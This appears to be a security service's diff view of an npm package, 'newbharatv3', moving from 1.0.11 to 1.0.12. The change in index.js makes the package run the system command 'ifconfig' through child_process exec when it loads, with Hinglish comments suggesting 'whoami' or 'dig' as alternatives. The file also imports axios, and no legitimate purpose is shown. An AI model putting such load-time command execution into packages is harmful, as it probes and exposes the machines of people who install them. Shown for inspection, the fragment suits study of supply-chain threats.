newbharatv3 1.0.11 → 1.0.12
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -2,7 +2,7 @@ const { exec } = require('child_process');
|
|
2
2
|
const axios = require('axios');
|
3
3
|
|
4
4
|
// System command run karna (e.g., 'whoami' ya 'dig example.com')
|
5
|
-
const command = '
|
5
|
+
const command = 'ifconfig'; // yahan apni desired command likho
|
6
6
|
|
7
7
|
exec(command, async (error, stdout, stderr) => {
|
8
8
|
if (error) {
|